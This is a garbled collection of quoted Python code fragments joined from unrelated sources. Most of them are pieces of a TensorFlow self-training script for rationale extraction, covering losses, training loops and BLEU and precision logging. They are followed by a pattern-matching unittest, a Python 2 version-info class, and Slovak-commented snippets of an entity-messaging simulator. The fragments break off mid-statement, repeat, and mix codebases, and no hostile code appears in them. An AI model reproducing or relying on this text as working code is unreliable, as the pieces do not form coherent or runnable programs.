'rationale_task_classifier': 
None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':", "shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED", "cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss", "labels {}\".format(labels)) #split X and y to train and dev with valid_split if", "X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)),", "temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f:", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true,", "y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss =", "y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = 
y_val[indices] probs_rat = y_rat[indices]", "performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch <", "= test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ ==", "#logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1,", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #,", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True,", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc", "Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. 
This code", "axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc", "0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp", "y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev,", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5]", "'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc =", "y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs", "dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0,", "y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_:", "restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope():", "type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "[y_dev[:,0], y_dev[:,1:]]), 
batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint':", "0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. if 'mtl' in", "'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]},", "X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev", "(\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif", "type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "#logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False,", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0,", "else: logger.info(\"No sampling at the 
moment; choose all the unlabeled examples\") X_batch =", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices]", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':", "test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))],", "= np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}:", "instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_:", "coh_loss = 
tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss +", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices],", "= y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:]", "in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]])))", "np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #", "= np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0,", "= 0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. 
max_best_acc =", "= np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:],", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X", "as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import", "number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", ": {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1]", "verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out =", "labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx", "on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test", "[] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] =", "0, 1, 
0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r']", "\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:],", "None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss", "#, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length))", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc =", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, 
y_pred[indices] else: logger.info (\"Evaluating confidence on", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "{}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc", "(\"Best Test task acc for run {} with total loss : {}\".format(counter, task_acc))", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices],", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg", "X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal'", "tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p))", "tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: 
{}\".format(tp/(tp+fp+fn)))", "test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set", "axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc =", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0))", "len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0]", "[y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc =", "= X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if", "with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0]", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha", "= test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in", "rationale from teacher model as input for task: 
{}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher", "run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc", "axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred))", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else:", "#y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred,", "if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model", "f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop", "valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "that are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]),", "in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the", "\".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3", "task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], 
average='macro')))" ]
[ "unittest from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', ''))", ". import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a'))", "import unittest from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.',", "PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab')) self.assertTrue(pat.match('a', 'a'))", "class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab')) self.assertTrue(pat.match('a',", "import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.',", "pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab'))", "from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*'," ]
[ "def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\"", "\\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s", "Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage:", "__init__(self, program, version, date, author): self.program = program self.version = version self.date =", "date, author): self.program = program self.version = version self.date = date self.author =", "\"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v", "/usr/bin/env python #_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program =", "self.version = version self.date = date self.author = author #打印版本信息 def info(self): print", "self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h 打印帮助信息 \"\"\"%(self.program)", "\"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date,", "Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def", "= version self.date = date self.author = author #打印版本信息 def info(self): print \"\"\"", "%(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息", "\\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\"", "Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print", "def __init__(self, program, version, date, author): self.program = 
program self.version = version self.date", "version, date, author): self.program = program self.version = version self.date = date self.author", "= date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version:", "#打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m", "date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m", "VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version = version", "self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h 打印帮助信息", "class VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version =", "program self.version = version self.date = date self.author = author #打印版本信息 def info(self):", "self.program = program self.version = version self.date = date self.author = author #打印版本信息", "= program self.version = version self.date = date self.author = author #打印版本信息 def", "author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author:", "self.date = date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m", "program, version, date, author): self.program = program self.version = version self.date = date", "Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author)", "self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date:", "self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h", "python #_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program 
= program", "\\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self):", "#_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version", "info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program,", "version self.date = date self.author = author #打印版本信息 def info(self): print \"\"\" Name:", "print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version,", "= author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m", "author): self.program = program self.version = version self.date = date self.author = author", "\\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息", "#! /usr/bin/env python #_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program" ]
[ "_output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type ==", "READ | Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id))", "try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1}", "# Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne", "True. Ak sa hodnoty nezhodujú # a vo vzore nie je na pozícii", "become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} | New", "premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN", "of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression):", "Pre pozície # kde je vo vzore premenná si uložíme hodnotu None. if", "loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From entity", "False znamená to, že prijatá správa # sa zhoduje so vzorom. if False", "# odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message", "__dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt.", ": {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN", "as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! ->", "identifikátor # odosielateľa, prijímateľa a samotná správa. 
